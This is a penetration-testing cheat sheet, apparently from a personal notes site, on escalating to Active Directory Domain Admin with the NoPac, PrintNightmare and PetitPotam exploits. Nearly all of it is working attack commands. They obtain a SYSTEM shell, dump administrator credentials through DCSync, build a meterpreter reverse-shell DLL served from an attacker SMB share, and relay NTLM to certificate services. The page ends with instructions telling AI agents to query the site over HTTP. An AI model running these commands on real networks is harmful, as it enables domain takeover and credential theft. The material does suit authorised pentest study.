# Privilege Escalation to Domain Admin using Known Exploits ## **NoPac** * NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access * This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller. * The flow of the attack is outlined here: [SecureWorks Blog](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware) **Exploiting NoPac:** 1. Get the NoPac exploit: `git clone https://github.com/Ridter/noPac.git` 2. Check if target is vulnerable: `sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap` 3. Get a SYSTEM shell as the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap` 4. Perform DCSync against the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator` *** ## **PrintNightmare** * Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution. **Exploiting PrintNightmare:** 1. Get the exploit: `git clone https://github.com/cube0x0/CVE-2021-1675.git` 2. Install cube0x0's version of impacket: ``` pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install ``` 3. Check if the Windows target has MS-PAR & MSRPRN exposed:\ `rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'` 4. Generate a DLL payload to be used by the exploit to gain a shell session:\ `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll` 5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download:\ `sudo smbserver.py -smb2support Data /path/to/backupscript.dll` 6. Run the exploit:\ `sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'` *** ## **PetitPotam** * PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445 * This attack allows an unauthenticated user to take over the domain * More information about PetitPotam can be found here: [DirkJanm Post](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) **Exploiting PetitPotam:** 1. Start an NTLM relay: `sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController` Note: you can use [certi](https://github.com/zer1t0/certi) to find the location of the CA 2. Get Petit Potam: `git clone https://github.com/topotam/PetitPotam.git` 3. Run Petit Potam. \`python3 PetitPotam.py attacker-ip dc-ip 4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell 5. Request a TGT for the domain controller using the certificate: `python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 = dc01.ccache` 6. Set the KRB5CCNAME environment variable to the previous output file: `export KRB5CCNAME=dc01.ccache` 7. Perform DCSync using (`-k`) the previous ccache file : `secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/active-directory/privilege-escalation-to-domain-admin-using-known-exploits.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.